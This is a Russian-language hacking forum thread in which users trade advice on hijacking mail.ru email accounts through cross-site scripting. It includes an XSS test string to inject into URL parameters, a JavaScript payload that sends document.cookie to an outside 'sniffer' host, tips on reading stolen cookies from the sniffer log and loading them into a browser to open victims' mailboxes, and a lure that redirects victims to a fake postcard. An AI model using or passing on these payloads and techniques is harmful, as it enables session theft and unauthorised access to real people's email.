Цитата:

Сообщение от noxcho

Народ такая проблема есть ,может не по теме но голову скоро разобю об стену, короче скачал прогу TINY XSS scanner ввел адресс _http:mail.ru_
и уже 10 час жду уязвимый XSS. Как проще ручкали искать объяснит кто нибудь ламеру а лучше видео пусть сделает.

программой не найдеш =) особенно на майл ру)

ручками можеш поимкать с помощью этого скрипта
">alert()
вставляеш его после первого знака = в адресной строке.
И еще в строчки где есть запрос на отправку

сори за глупость ! нокак это сделать ???

img = new Image(); img.src = "http://httpz.ru/nrwlwmemn5w.gif?"+document.cookie;

Цитата:

Сообщение от kamikadze1988

Я смог получить куки, но изображение открывается только в IE, в опере и фаерфоксе не открывается, соответственно куки не приходят.
Не подскажите в чём дело?

незнаю попробуй поменять ссылку на картинку.. (картинку вставь другую):turned:

народ,объясните ламеру... где стыриные куки смотреть? куда они придут??? пожалуста...

вообщем такая хрень у меня
делаю всё как сдесь.. куки приходят, всё норм
но когда сую куки в оперу, почта не открывается
что делать ?

насчет трюка с написанием скрипта и его сохранением под .img >>>>>в майле и рамблере такое не катит уже. картинка не открывается в браузере а значит и скрипт не запашет
у кого есть способы обойти эту защиту напишите кому не в падлу и не ставьте плиз 70-80 сообщений чтоб увидеть текст

Цитата:

Сообщение от noxcho

насчет трюка с написанием скрипта и его сохранением под .img >>>>>в майле и рамблере такое не катит уже. картинка не открывается в браузере а значит и скрипт не запашет
у кого есть способы обойти эту защиту напишите кому не в падлу и не ставьте плиз 70-80 сообщений чтоб увидеть текст

с пассивкой можно сделать редирект на открытку:wink: чел смотрит фотку ты смотришь его почту:turned:

Цитата:

Сообщение от PioNeeRkin

народ,объясните ламеру... где стыриные куки смотреть? куда они придут??? пожалуста...

куки на сниффере! в разделе "лог"

Добавлено через 10 минут

Цитата:

Сообщение от noxcho

насчет трюка с написанием скрипта и его сохранением под .img >>>>>в майле и рамблере такое не катит уже. картинка не открывается в браузере а значит и скрипт не запашет

Не знаю, у меня на майле все отлично работает =)

смотри все ли правильно сделал! поидеи должны приходить! только если жертва не сохраняла сначала на комп а потом заходила.. тогда прийдет только ип. и через день и через 2 ты уже не зайдешь! они изменяются!